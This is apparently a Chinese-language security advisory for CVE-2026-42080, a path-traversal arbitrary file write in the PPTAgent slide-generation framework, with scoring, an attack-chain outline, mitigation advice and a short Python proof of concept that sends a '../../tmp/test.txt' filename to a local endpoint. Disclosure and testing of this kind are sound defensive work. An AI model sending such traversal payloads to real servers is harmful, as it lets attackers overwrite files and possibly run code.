CVE-2026-42080 CVSS 4.6 中危

CVE-2026-42080 PPTAgent任意文件写入漏洞

披露日期: 2026-05-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42080

漏洞类型

任意文件写入

CVSS评分

4.6 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PPTAgent

漏洞概述

PPTAgent是一个用于生成PowerPoint的代理框架。在commit 418491a之前的版本中，该框架存在一个任意文件写入漏洞。该漏洞源于`save_generated_slides`函数未能正确验证输入文件路径，导致攻击者可以利用特定参数在服务器上的任意位置写入文件。由于CVSS评分为4.6（中危），且需要低权限用户交互，攻击者需诱导用户执行特定操作才能利用此漏洞。成功利用可能导致系统完整性或可用性受到影响，目前官方已通过提交补丁修复了此问题。

技术细节

该漏洞发生在PPTAgent处理生成的幻灯片保存逻辑时。在`save_generated_slides`功能中，程序未对用户提供的文件名或路径参数进行充分的校验和净化。攻击者可以通过构造包含路径遍历序列（如`../`）的恶意输入，绕过原本的保存目录限制。虽然攻击需要低权限（PR:L）和用户交互（UI:R），且攻击复杂度低（AC:L），但利用此漏洞可以将恶意文件写入到Web根目录、系统配置文件或其他敏感位置。虽然机密性影响为无，但完整性（I:L）和可用性（A:L）受到低等影响。攻击者可能通过覆盖关键配置文件或写入恶意脚本，结合特定环境提升为远程代码执行风险。修复方案通过引入严格的路径校验机制，确保文件操作被限制在预定目录内。

攻击链分析

STEP 1

访问服务

攻击者获得对PPTAgent服务的低权限访问权限。

STEP 2

触发功能

攻击者诱导用户或利用`save_generated_slides`功能触发保存操作。

STEP 3

注入载荷

攻击者在文件名参数中注入路径遍历字符（如../）。

STEP 4

写入文件

系统处理请求，将文件写入服务器非预期的任意位置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://localhost:8000/api/save_slides"

# Malicious payload using path traversal
# The goal is to write a file "test.txt" to the parent directory
payload = {
    "filename": "../../tmp/test.txt",  # Path traversal payload
    "content": "This is a malicious content written by POC."
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print("[+] Exploit successful! File written.")
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

PPTAgent < commit 418491a

防御指南

临时缓解措施

建议立即检查PPTAgent的代码版本，确认是否在commit 418491a之前。如果是，请尽快应用官方提供的补丁或更新代码。在未更新前，严格限制对该服务的网络访问权限，避免非信任用户交互。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表